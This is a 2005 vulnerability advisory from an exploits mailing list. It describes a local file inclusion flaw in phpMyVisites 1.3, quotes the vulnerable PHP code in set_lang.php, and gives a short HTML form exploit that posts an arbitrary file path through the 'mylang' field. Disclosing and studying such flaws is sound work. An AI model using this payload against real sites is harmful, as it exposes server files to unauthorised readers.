<<< Date Index >>>     <<< Thread Index >>>

[exploits] phpMyVisites 1.3 local file retrieval




==================================================================
File: phpMyVisites 1.3 local file retrieval
From: remote
Date: 26/04/2005
Credits: Max Cerny (max[at]czerny[dot]cz)
Vendor: http://www.phpmyvisites.net
Affected version: 1.3, > not tested
==================================================================

==================================================================
Description:
 Remote user can retrieve local file on the webserver 
phpMyVisites is running on. It's cause due to bad user data 
validation code. 

FILE: include/set_lang.php

line 94: 
 include "./langs/".$lang['default_lang'];

assuming, we have set $lang['default_lang'] on line 66:
 $lang['default_lang'] = $_COOKIE[$nomcookielg];

it's good, look onto 
line 40:
 setcookie($nomcookielg,$_POST['mylang'],time()+3600*24*365*10);

Now, we are able to spoof the value of $_POST['mylang'] to any file, 
we want to be retrieved.

==================================================================

==================================================================
Exploit:
 <form action="http://[pathtoyourphpMyVisites]/login.php"; method="POST">
Local file: <input type="text" name="mylang" value="" />
<input type="submit" value="Alexx says RELAX!">
</form>

==================================================================

==================================================================
Fix:
 Contact the Vendor

==================================================================
                        Have a nice Day !
==================================================================